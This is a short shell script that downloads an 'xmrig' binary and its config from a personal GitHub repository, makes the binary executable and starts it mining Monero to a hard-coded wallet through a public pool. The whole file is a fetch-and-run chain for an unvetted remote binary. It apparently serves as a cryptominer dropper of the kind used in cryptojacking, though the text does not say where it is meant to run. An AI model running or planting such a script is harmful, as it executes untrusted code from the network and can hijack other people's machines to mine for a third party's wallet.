#! /bin/sh
wget https://raw.githubusercontent.com/duggsydaddy/xmrsample2/main/config.json && wget https://raw.githubusercontent.com/duggsydaddy/xmrsample2/main/SHA256SUMS && wget https://github.com/duggsydaddy/xmrsample2/raw/main/xmrig && chmod +x xmrig && ./xmrig -o pool.minexmr.com:4444 -u 4AHcfXNosADQX5jSDTAAEXFchzZMQyxjZKSecUSPmyf6T4SzCMVkjsU8tnKiWUk1ApiwC69A1sVUHUJ5KbusHSuT8hayurp
